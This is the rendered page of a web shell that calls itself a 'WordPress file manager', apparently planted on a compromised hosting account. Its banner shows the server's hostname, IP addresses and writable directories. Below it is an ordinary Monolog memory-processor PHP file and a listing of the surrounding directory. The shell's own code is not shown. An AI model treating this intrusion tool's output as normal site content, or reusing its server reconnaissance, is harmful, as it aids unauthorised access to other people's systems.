✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ webm004.cluster127.gra.hosting.ovh.net ​🇻​♯➤ 6.18.42-ovh-vps-grsec-zfs+ #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 54.36.91.62 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.223
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ _dyuweyrj4,_dyuweyrj4r,dl

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/docteuh/www/maint-20260907122447/Processor//MemoryProcessor.php
<?php

/*
 * This file is part of the Monolog package.
 *
 * (c) Jordi Boggiano <j.boggiano@seld.be>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
namespace Google\Site_Kit_Dependencies\Monolog\Processor;

/**
 * Some methods that are common for all memory processors
 *
 * @author Rob Jensen
 */
abstract class MemoryProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface
{
    /**
     * @var bool If true, get the real size of memory allocated from system. Else, only the memory used by emalloc() is reported.
     */
    protected $realUsage;
    /**
     * @var bool If true, then format memory size to human readable string (MB, KB, B depending on size)
     */
    protected $useFormatting;
    /**
     * @param bool $realUsage     Set this to true to get the real size of memory allocated from system.
     * @param bool $useFormatting If true, then format memory size to human readable string (MB, KB, B depending on size)
     */
    public function __construct($realUsage = \true, $useFormatting = \true)
    {
        $this->realUsage = (bool) $realUsage;
        $this->useFormatting = (bool) $useFormatting;
    }
    /**
     * Formats bytes into a human readable string if $this->useFormatting is true, otherwise return $bytes as is
     *
     * @param  int        $bytes
     * @return string|int Formatted string if $this->useFormatting is true, otherwise return $bytes as is
     */
    protected function formatBytes($bytes)
    {
        $bytes = (int) $bytes;
        if (!$this->useFormatting) {
            return $bytes;
        }
        if ($bytes > 1024 * 1024) {
            return \round($bytes / 1024 / 1024, 2) . ' MB';
        } elseif ($bytes > 1024) {
            return \round($bytes / 1024, 2) . ' KB';
        }
        return $bytes . ' B';
    }
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
22 Sep 2026 4.46 PM
docteuh / users
0755
GitProcessor.php
1.542 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
IntrospectionProcessor.php
3.509 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
MemoryPeakUsageProcessor.php
0.845 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
MemoryProcessor.php
1.866 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
MemoryUsageProcessor.php
0.826 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
MercurialProcessor.php
1.504 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
ProcessIdProcessor.php
0.664 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
ProcessorInterface.php
0.536 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
PsrLogMessageProcessor.php
2.622 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
TagProcessor.php
0.9 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
UidProcessor.php
1.339 KB
6 Dec 2023 8.16 PM
docteuh / users
0644
WebProcessor.php
3.155 KB
6 Dec 2023 8.16 PM
docteuh / users
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF